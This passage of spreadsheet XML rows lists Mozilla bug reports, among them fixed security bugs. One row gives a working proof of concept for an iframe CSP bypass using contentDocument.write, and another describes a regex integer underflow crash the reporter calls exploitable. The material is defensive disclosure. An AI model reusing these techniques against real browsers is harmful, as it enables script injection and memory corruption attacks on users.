          <t>iframe CSP bypass via "unsafe-inline" script in parent frame despite iframe CSP having `default-src: none`</t>
        </is>
      </c>
      <c r="D2718" t="inlineStr">
        <is>
          <t>2024-05-14 21:13:42 -0700</t>
        </is>
      </c>
      <c r="E2718" t="n">
        <v>1</v>
      </c>
      <c r="F2718" t="n">
        <v>1</v>
      </c>
      <c r="G2718" t="n">
        <v>3</v>
      </c>
      <c r="H2718" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2718" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2718" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2718" t="inlineStr">
        <is>
          <t>Firefox 99</t>
        </is>
      </c>
      <c r="L2718" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2718" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2718" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2718" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2718" t="inlineStr">
        <is>
          <t>[adv-main122+][adv-esr115.7+]</t>
        </is>
      </c>
      <c r="Q2718" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2718" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2718" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T2718" t="n">
        <v>1</v>
      </c>
      <c r="U2718" t="n">
        <v>0</v>
      </c>
      <c r="V2718" t="n">
        <v>28</v>
      </c>
      <c r="W2718" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Steps to reproduce:
1. Set the following files on your web server.
```test.html
&lt;html&gt;
    &lt;head&gt;
        &lt;meta http-equiv="Content-Security-Policy" content="script-src 'unsafe-inline'"&gt;
    &lt;/head&gt;
    &lt;body&gt;
        &lt;iframe id=x src='self.html'&gt;&lt;/iframe&gt;
        &lt;script nonce=123&gt;
            x.onload=_=&gt;x.contentDocument.write('&lt;script&gt;alert(1)&lt;\/script&gt;');
        &lt;/script&gt;
    &lt;/body&gt;
&lt;/html&gt; 
```
```self.html
&lt;html&gt;
    &lt;head&gt;
        &lt;meta http-equiv="Content-Security-Policy" content="default-src 'none'"&gt;
    &lt;/head&gt;
    &lt;body&gt;
    &lt;/body&gt;
&lt;/html&gt;
```
2. Go to the test.html page
Actual results:
The inline script written in the iframe is executed.
Expected results:
CSP is defined for each page. That is, when specifying a separate page (eg, self.html) other than the local scheme (https://www.w3.org/TR/CSP3/#security-inherit-csp) in the iframe src, the iframe must be affected by the corresponding CSP, not the parent CSP. However, I confirmed that the CSP of the parent page is inherited to another separate page when writing is performed by calling the x.contentDocument.write function in Firefox.
Although self.html should not allow inline script execution according to its CSP default-src 'none', an attacker can use the trick in this report to cause inline scripts to be executed in self.html environment.</t>
        </is>
      </c>
      <c r="X2718" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2719">
      <c r="A2719" t="n">
        <v>684815</v>
      </c>
      <c r="B2719" t="inlineStr">
        <is>
          <t>2011-09-06 03:35:29 -0700</t>
        </is>
      </c>
      <c r="C2719" t="inlineStr">
        <is>
          <t>Crash in the SpiderMonkey v.1.9.2 (FF 3.6.21) during regular expression evaluation</t>
        </is>
      </c>
      <c r="D2719" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:31 -0700</t>
        </is>
      </c>
      <c r="E2719" t="n">
        <v>1</v>
      </c>
      <c r="F2719" t="n">
        <v>1</v>
      </c>
      <c r="G2719" t="n">
        <v>3</v>
      </c>
      <c r="H2719" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2719" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2719" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2719" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L2719" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2719" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2719" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2719" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2719" t="inlineStr">
        <is>
          <t>[sg:critical] wanted-standalone-js</t>
        </is>
      </c>
      <c r="Q2719" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2719" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2719" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2719" t="n">
        <v>0</v>
      </c>
      <c r="U2719" t="n">
        <v>0</v>
      </c>
      <c r="V2719" t="n">
        <v>5</v>
      </c>
      <c r="W2719" t="inlineStr">
        <is>
          <t>Created attachment 558436
regx.htm
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.854.0 Safari/535.2
Steps to reproduce:
Originally I browsed to attached regx.htm file using FireFox 3.6.21 on Windows 7 x64
Actual results:
Browser crashed with a crash stack like
 	mozcrt19.dll!memcpy(unsigned char * dst, unsigned char * src, unsigned long count)  Line 188	Asm
	js3250.dll!PushBackTrackState(REGlobalData * gData, REOp op, unsigned char * target, REMatchState * x, const unsigned short * cp, unsigned int parenIndex, unsigned int parenCount)  Line 3477 + 0x17 bytes	C++
 	js3250.dll!js_ExecuteRegExp(JSContext * cx, JSRegExp * re, JSString * str, unsigned int * indexp, int test, int * rval)  Line 4897 + 0x8e bytes	C++
 	js3250.dll!regexp_exec_sub(JSContext * cx, JSObject * obj, unsigned int argc, int * argv, int test, int * rval)  Line 5716 + 0x3e bytes	C++
 	js3250.dll!regexp_test(JSContext * cx, unsigned int argc, int * vp)  Line 5741 + 0x71 bytes	C++
 	js3250.dll!js_Interpret(JSContext * cx)  Line 2208 + 0x1d bytes	C++
 	mozcrt19.dll!arena_malloc_small(arena_s * arena, unsigned int size, int zero)  Line 3737	C
 	mozcrt19.dll!malloc(unsigned int size)  Line 5790 + 0x2f bytes	C
 	js3250.dll!js_NewObjectWithGivenProto(JSContext * cx, JSClass * clasp, JSObject * proto, JSObject * parent, unsigned int objectSize)  Line 2090 + 0x2d bytes	C++
 	xul.dll!WrappedNative2WrapperMap::Add(WrappedNative2WrapperMap * head, JSObject * wrappedObject, JSObject * wrapper)  Line 726 + 0x8 bytes	C++
 	xul.dll!nsXPConnect::GetWrapperForObject(JSContext * aJSContext, JSObject * aObject, JSObject * aScope, nsIPrincipal * aPrincipal, unsigned int aFilenameFlags, int * _retval)  Line 2478 + 0x96 bytes	C++
 	xul.dll!XPC_WN_JSOp_ThisObject(JSContext * cx, JSObject * obj)  Line 1471	C++
The same crash happened on Ubuntu Linux and on Debian Linux 5.0. The I took sources from http://hg.mozilla.org/releases/mozilla-1.9.2/, built SpiderMonkey 1.9.2 and its shell demonstrate the same crash when run on extracted from HTML file JavaScript:
#0  0x00529caf in memcpy () from /lib/libc.so.6
#1  0x08119f01 in PushBackTrackState (gData=0xbf88a32c, op=REOP_EOL, target=0xb6d6451b ".\035\0030", 
    x=0x9d28d50, cp=0x9d24310, parenIndex=0, parenCount=0) at ../jsregexp.cpp:3477
#2  0x0811a4a1 in ExecuteREBytecode (gData=0xbf88a32c, x=0x9d28d50) at ../jsregexp.cpp:4261
#3  0x0811fcdc in MatchRegExp (gData=0xbf88a32c, x=0x9d28d50) at ../jsregexp.cpp:4754
#4  0x0811fef7 in js_ExecuteRegExp (cx=0x9cfce18, re=0xb6d4d008, str=0x9d1a690, indexp=0xbf88a440, test=1, 
    rval=0x9d244a8) at ../jsregexp.cpp:4883
#5  0x0812098e in regexp_exec_sub (cx=0x9cfce18, obj=0x9d1d0e0, argc=1, argv=0x9d244b0, test=1, rval=0x9d244a8)
    at ../jsregexp.cpp:5696
#6  0x08120a6e in regexp_test (cx=0x9cfce18, argc=1, vp=0x9d244a8) at ../jsregexp.cpp:5721
#7  0x081e39eb in js_Interpret (cx=0x9cfce18) at ../jsops.cpp:2208
#8  0x080c2cf6 in js_Execute (cx=0x9cfce18, chain=0x9d1d000, script=0x9d243b0, down=0x0, flags=0, result=0x0)
    at ../jsinterp.cpp:1601
#9  0x0805b1b3 in JS_ExecuteScript (cx=0x9cfce18, obj=0x9d1d000, script=0x9d243b0, rval=0x0) at ../jsapi.cpp:4964
#10 0x080530dc in Process (cx=0x9cfce18, obj=0x9d1d000, filename=0xbf88c7a1 "regexe.js", forceTTY=0)
    at ../../shell/js.cpp:442
#11 0x08053c7f in ProcessArgs (cx=0x9cfce18, obj=0x9d1d000, argv=0xbf88add8, argc=1) at ../../shell/js.cpp:849
#12 0x0805405f in main (argc=1, argv=0xbf88add8, envp=0xbf88ade0) at ../../shell/js.cpp:4853
(gdb) f 1
#1  0x08119f01 in PushBackTrackState (gData=0xbf88a32c, op=REOP_EOL, target=0xb6d6451b ".\035\0030", 
    x=0x9d28d50, cp=0x9d24310, parenIndex=0, parenCount=0) at ../jsregexp.cpp:3477
3477               sizeof(REProgState) * result-&gt;saveStateStackTop);
gdb) p/x result-&gt;saveStateStackTop
$4 = 0xfffffcea
(gdb) p sizeof(REProgState)
$5 = 24
For the best of my understanding this crash is exploitable, because memcpy function overrides both stack and heap - it tries to copy ~24*4GB of memory due to the integer underflow of result-&gt;saveStateStackTop and data to be copied is under control of web page author - both regular expression and string to search in. Before this crash happens valgrind reports about number of related invalid write(s) and read(s).
Expected results:
No crash</t>
        </is>
      </c>
      <c r="X2719" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2720">
      <c r="A2720" t="n">
        <v>1244995</v>
      </c>
      <c r="B2720" t="inlineStr">
        <is>
          <t>2016-02-01 20:38:38 -0800</t>
        </is>
      </c>
      <c r="C2720" t="inlineStr">
        <is>
          <t>Crash [@ JSAutoCompartment::JSAutoCompartment | mozilla::dom::Console::ProcessCallData] with gczeal</t>
        </is>
      </c>
      <c r="D2720" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2720" t="n">
        <v>1</v>
      </c>
      <c r="F2720" t="n">
        <v>1</v>
      </c>
      <c r="G2720" t="n">
        <v>3</v>
      </c>
      <c r="H2720" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2720" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2720" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2720" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2720" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2720" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2720" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2720" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2720" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2720" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2720" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2720" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T2720" t="n">
        <v>1</v>
      </c>
      <c r="U2720" t="n">
        <v>0</v>
      </c>
      <c r="V2720" t="n">
        <v>37</v>
      </c>
      <c r="W2720" t="inlineStr">
        <is>
          <t>Created attachment 8714636
testcase
Testcase requires https://github.com/MozillaSecurity/funfuzz/tree/master/dom/extension in order to call gczeal. Easiest way is to run funfuzz/dom/automation/domInteresting.py &lt;build&gt; &lt;testcase&gt;.
Debug:
  [@ JSAutoCompartment::JSAutoCompartment] - Invalid read
  [@ js::CompartmentChecker::fail] - Compartment mismatch
Debug+ASan:
  [@ JSAutoCompartment::JSAutoCompartment] - Invalid read
Non-debug:
  Testcase does not run because gczeal is disabled.</t>
        </is>
      </c>
      <c r="X2720" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2721">
      <c r="A2721" t="n">
        <v>726160</v>
      </c>
      <c r="B2721" t="inlineStr">
        <is>
          <t>2012-02-10 13:53:46 -0800</t>
        </is>
      </c>
      <c r="C2721" t="inlineStr">
        <is>
          <t>Update /Technology for Firefox 11</t>
        </is>
      </c>
      <c r="D2721" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E2721" t="n">
        <v>1</v>
      </c>
      <c r="F2721" t="n">
        <v>1</v>
      </c>
      <c r="G2721" t="n">
        <v>5</v>
      </c>
      <c r="H2721" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2721" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J2721" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2721" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2721" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2721" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2721" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2721" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2721" t="inlineStr">
        <is>
          <t>r=102688,102875,102910 b=trunk</t>
        </is>
      </c>
      <c r="Q2721" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2721" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2721" t="inlineStr">
        <is>
          <t>1.10</t>
        </is>
      </c>
      <c r="T2721" t="n">
        <v>1</v>
      </c>
      <c r="U2721" t="n">
        <v>0</v>
      </c>
      <c r="V2721" t="n">
        <v>19</v>
      </c>
      <c r="W2721" t="inlineStr">
        <is>
          <t>Update Content of /Technology per content in https://pmm.etherpad.mozilla.org/30
Currently working on content--will post here when complete.</t>
        </is>
      </c>
      <c r="X2721" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2722">
      <c r="A2722" t="n">
        <v>910375</v>
      </c>
      <c r="B2722" t="inlineStr">
        <is>
          <t>2013-08-28 11:20:58 -0700</t>
        </is>
      </c>
      <c r="C2722" t="inlineStr">
        <is>
          <t>New PanelUI / toolbar customization event spoofing</t>
        </is>
      </c>
      <c r="D2722" t="inlineStr">
        <is>
          <t>2015-02-18 13:40:37 -0800</t>
        </is>
      </c>
      <c r="E2722" t="n">
        <v>1</v>
      </c>
      <c r="F2722" t="n">
        <v>1</v>
      </c>
      <c r="G2722" t="n">
        <v>2</v>
      </c>
      <c r="H2722" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2722" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2722" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K2722" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2722" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2722" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2722" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2722" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2722" t="inlineStr">
        <is>
          <t>[Australis:P4][Australis:M9][adv-main29-]</t>
        </is>
      </c>
      <c r="Q2722" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2722" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2722" t="inlineStr">
        <is>
          <t>Firefox 29</t>
        </is>
      </c>
      <c r="T2722" t="n">
        <v>1</v>
      </c>
      <c r="U2722" t="n">
        <v>0</v>
      </c>
      <c r="V2722" t="n">
        <v>45</v>
      </c>
      <c r="W2722" t="inlineStr">
        <is>
          <t>Created attachment 796806
drag.html
It is possible to craft a drag and drop event in content which mimics the behavior of a chrome customization event. This attack is very unlikely as it requires the user to have the customizable page / panel open and then drag and drop from another window to the page. The impact is also very low since all an attacker can do is move icons around. The current chrome code only uses the event to pick an icon to move.
Marking this as security sensitive though it likely doesn't have to be since the code hasn't shipped yet.
STR
1. Open about:customizing
2. Open above file in another window or visit
https://people.mozilla.com/~dchan/drag.html
3. Drag the Firefox icon to one of the about:customizing panels
Result
The Subscribe icon moves
Expected
Icon doesn't move</t>
        </is>
      </c>
      <c r="X2722" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2723">
      <c r="A2723" t="n">
        <v>860996</v>
      </c>
      <c r="B2723" t="inlineStr">
        <is>
          <t>2013-04-11 16:42:18 -0700</t>
        </is>
      </c>
      <c r="C2723" t="inlineStr">
        <is>
          <t>Remove getpersonas.com links and content on mozilla.org</t>
        </is>
      </c>
      <c r="D2723" t="inlineStr">
        <is>
          <t>2014-02-10 00:56:28 -0800</t>
        </is>
      </c>
      <c r="E2723" t="n">
        <v>1</v>
      </c>
      <c r="F2723" t="n">
        <v>1</v>
      </c>
      <c r="G2723" t="n">
        <v>5</v>
      </c>
      <c r="H2723" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2723" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J2723" t="inlineStr">
        <is>
          <t>Pages &amp; Content</t>
        </is>
      </c>
      <c r="K2723" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2723" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2723" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2723" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2723" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2723" t="inlineStr">
        <is>
          <t>r=116429</t>
        </is>
      </c>
      <c r="Q2723" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2723" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2723" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2723" t="n">
        <v>1</v>
      </c>
      <c r="U2723" t="n">
        <v>0</v>
      </c>
      <c r="V2723" t="n">
        <v>23</v>
      </c>
      <c r="W2723" t="inlineStr">
        <is>
          <t>Below is a grep of Bedrock for references to getpersonas.com. Now that getpersonas.com is redirected to AMO, these need to be resolved asap.
apps/firefox/templates/firefox/base-resp.html:        &lt;li class="last"&gt;&lt;a href="http://www.getpersonas.com/" tabindex="-1"&gt;{{_('Personas')}}&lt;/a&gt;&lt;/li&gt;
apps/firefox/templates/firefox/base.html:        &lt;li class="last"&gt;&lt;a href="http://www.getpersonas.com/" tabindex="-1"&gt;{{ _('Personas') }}&lt;/a&gt;&lt;/li&gt;
apps/firefox/templates/firefox/customize.html:      &lt;p&gt;Make Firefox match your style! Choose from thousands of &lt;a href="http://www.getpersonas.com/"&gt;Personas&lt;/a&gt; designed by users around the world, or &lt;a href="http://www.getpersonas.com/en-US/demo_create"&gt;create one yourself&lt;/a&gt;. With a single click you can dress up your browser however you want.&lt;/p&gt;
apps/firefox/templates/firefox/customize.html:          &lt;li&gt;&lt;a href="http://www.getpersonas.com/en-US/persona/7610"&gt;&lt;img src="http://www.getpersonas.com/static/1/0/7610/preview.jpg" width="138" height="46" alt="Japanese Tattoo" /&gt;&lt;/a&gt;&lt;/li&gt;
apps/firefox/templates/firefox/customize.html:          &lt;li&gt;&lt;a href="http://www.getpersonas.com/en-US/persona/30987"&gt;&lt;img src="http://www.getpersonas.com/static/8/7/30987/preview.jpg" width="138" height="46" alt="Endless Possibilities" /&gt;&lt;/a&gt;&lt;/li&gt;
apps/firefox/templates/firefox/customize.html:          &lt;li&gt;&lt;a href="http://www.getpersonas.com/en-US/persona/141882"&gt;&lt;img src="http://www.getpersonas.com/static/8/2/141882/preview.jpg" width="138" height="46" alt="kanagawa wave" /&gt;&lt;/a&gt;&lt;/li&gt;
apps/firefox/templates/firefox/customize.html:          &lt;li&gt;&lt;a href="http://www.getpersonas.com/en-US/persona/213203"&gt;&lt;img src="http://www.getpersonas.com/static/0/3/213203/preview.jpg" width="138" height="46" alt="Retro Notes Reloaded" /&gt;&lt;/a&gt;&lt;/li&gt;
apps/firefox/templates/firefox/customize.html:          &lt;li&gt;&lt;a href="http://www.getpersonas.com/en-US/persona/44136"&gt;&lt;img src="http://www.getpersonas.com/static/3/6/44136/preview.jpg" width="138" height="46" alt="Bob Marley" /&gt;&lt;/a&gt;&lt;/li&gt;
apps/firefox/templates/firefox/customize.html:          &lt;li&gt;&lt;a href="http://www.getpersonas.com/en-US/persona/64769"&gt;&lt;img src="http://www.getpersonas.com/static/6/9/64769/preview.jpg" width="138" height="46" alt="Sunset Over Water" /&gt;&lt;/a&gt;&lt;/li&gt;
apps/firefox/templates/firefox/customize.html:      &lt;p id="see-all-personas"&gt;&lt;a href="http://www.getpersonas.com/en-US/gallery/" class="feature arrow"&gt;See all 180,000+  ¬ª&lt;/a&gt;&lt;/p&gt;
apps/firefox/templates/firefox/features.html:        &lt;p&gt;Firefox looks for a secure connection before installing or updating add-ons, third-party software, and &lt;a href="http://www.getpersonas.com/en-US/"&gt;Personas&lt;/a&gt;.&lt;/p&gt;
apps/mozorg/templates/mozorg/emails/addons.txt:http://www.getpersonas.com/en-US/demo_create
apps/persona/templates/persona/developer-faq.html:    &lt;dt&gt;How is Mozilla Persona different than Firefox Personas hosted at www.getpersonas.com?&lt;/dt&gt;
media/js/firefox/customize.js:	'http://www.getpersonas.com/en-US/external/mozilla/';</t>
        </is>
      </c>
      <c r="X2723" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2724">
      <c r="A2724" t="n">
        <v>1449307</v>
      </c>
      <c r="B2724" t="inlineStr">
        <is>
          <t>2018-03-27 13:15:24 -0700</t>
        </is>
      </c>
      <c r="C2724" t="inlineStr">
        <is>
          <t>mobile-event ping JSON is invalid</t>
        </is>
      </c>
      <c r="D2724" t="inlineStr">
        <is>
          <t>2018-03-27 16:36:51 -0700</t>
        </is>
      </c>
      <c r="E2724" t="n">
        <v>1</v>
      </c>
      <c r="F2724" t="n">
        <v>1</v>
      </c>
      <c r="G2724" t="n">
        <v>2</v>
      </c>
      <c r="H2724" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2724" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J2724" t="inlineStr">
        <is>
          <t>Telemetry</t>
        </is>
      </c>
      <c r="K2724" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2724" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2724" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N2724" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2724" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2724" t="inlineStr"/>
      <c r="Q2724" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2724" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2724" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2724" t="n">
        <v>1</v>
      </c>
      <c r="U2724" t="n">
        <v>0</v>
      </c>
      <c r="V2724" t="n">
        <v>4</v>
      </c>
      <c r="W2724" t="inlineStr">
        <is>
          <t>Bug 1444425 regressed and broke the mobile-event ping JSON by sending settings-&gt;windowWidth and settings-&gt;windowHeight as integers instead of strings.</t>
        </is>
      </c>
      <c r="X2724" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2725">
      <c r="A2725" t="n">
        <v>391043</v>
      </c>
      <c r="B2725" t="inlineStr">
        <is>
          <t>2007-08-05 23:32:04 -0700</t>
        </is>
      </c>
      <c r="C2725" t="inlineStr">
        <is>
          <t>Content can hide the window's titlebar</t>
        </is>
      </c>
      <c r="D2725" t="inlineStr">
        <is>
          <t>2008-07-31 03:24:49 -0700</t>
        </is>
      </c>
      <c r="E2725" t="n">
        <v>1</v>
      </c>
      <c r="F2725" t="n">
        <v>1</v>
      </c>
      <c r="G2725" t="n">
        <v>3</v>
      </c>
      <c r="H2725" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2725" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2725" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2725" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2725" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2725" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2725" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2725" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2725" t="inlineStr">
        <is>
          <t>[sg:low spoof]</t>
        </is>
      </c>
      <c r="Q2725" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2725" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2725" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2725" t="n">
        <v>1</v>
      </c>
      <c r="U2725" t="n">
        <v>0</v>
      </c>
      <c r="V2725" t="n">
        <v>32</v>
      </c>
      <c r="W2725" t="inlineStr">
        <is>
          <t>Created attachment 275391
Testcase
Per the description: any arbitrary XUL document can hide the window's titlebar without any security checks.
Needless to say, this is very disorienting for a user, and therefore could trick the user into thinking the page is trusted.
The testcase is very simple; it just sets the hidechrome attribute onload.  I assume it wasn't intentional that this is accessible to content...</t>
        </is>
      </c>
      <c r="X2725" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2726">
      <c r="A2726" t="n">
        <v>482769</v>
      </c>
      <c r="B2726" t="inlineStr">
        <is>
          <t>2009-03-11 11:54:29 -0700</t>
        </is>
      </c>
      <c r="C2726" t="inlineStr">
        <is>
          <t>Website: Get Popularity Working</t>
        </is>
      </c>
      <c r="D2726" t="inlineStr">
        <is>
          <t>2016-07-29 13:12:35 -0700</t>
        </is>
      </c>
      <c r="E2726" t="n">
        <v>1</v>
      </c>
      <c r="F2726" t="n">
        <v>1</v>
      </c>
      <c r="G2726" t="n">
        <v>6</v>
      </c>
      <c r="H2726" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2726" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J2726" t="inlineStr">
        <is>
          <t>Personas Plus</t>
        </is>
      </c>
      <c r="K2726" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2726" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2726" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2726" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2726" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2726" t="inlineStr"/>
      <c r="Q2726" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2726" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2726" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T2726" t="n">
        <v>1</v>
      </c>
      <c r="U2726" t="n">
        <v>0</v>
      </c>
      <c r="V2726" t="n">
        <v>6</v>
      </c>
      <c r="W2726" t="inlineStr">
        <is>
          <t>Pedro needs to provide Toby with the feed in order to implement.</t>
        </is>
      </c>
      <c r="X2726" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2727">
      <c r="A2727" t="n">
        <v>619729</v>
      </c>
      <c r="B2727" t="inlineStr">
        <is>
          <t>2010-12-16 10:41:36 -0800</t>
        </is>
      </c>
      <c r="C2727" t="inlineStr">
        <is>
          <t>[x86-64] "graph server post results complete failed" caused by "No machine_name called '...' can be found"</t>
        </is>
      </c>
      <c r="D2727" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2727" t="n">
        <v>1</v>
      </c>
      <c r="F2727" t="n">
        <v>1</v>
      </c>
      <c r="G2727" t="n">
        <v>5</v>
      </c>
      <c r="H2727" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2727" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2727" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2727" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2727" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2727" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2727" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
